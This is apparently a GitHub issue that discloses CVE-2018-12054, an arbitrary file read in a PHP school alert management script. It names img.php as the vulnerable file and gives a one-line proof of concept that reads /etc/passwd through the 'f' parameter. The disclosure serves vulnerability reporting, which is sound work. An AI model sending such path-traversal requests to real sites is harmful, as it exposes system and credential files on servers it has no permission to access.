Skip to content

[CVE-2018-12054] Schools Alert Management Script - Arbitrary File Read #4

Open
@unh3x

Description

@unh3x

=================
Schools Alert Management Script - Arbitrary File Read

Date: 07.06.2018
Vendor Homepage: https://www.phpscriptsmall.com/
Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
Category: Web Application
Exploit Author: xiaotian.wang From DBAppSecurity
Tested on: Linux Mint
CVE: CVE-2018-12054

=================
Vulnerable cgi:

img.php

=================
Proof of Concept:

/img.php?f=/./etc/./passwd

image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions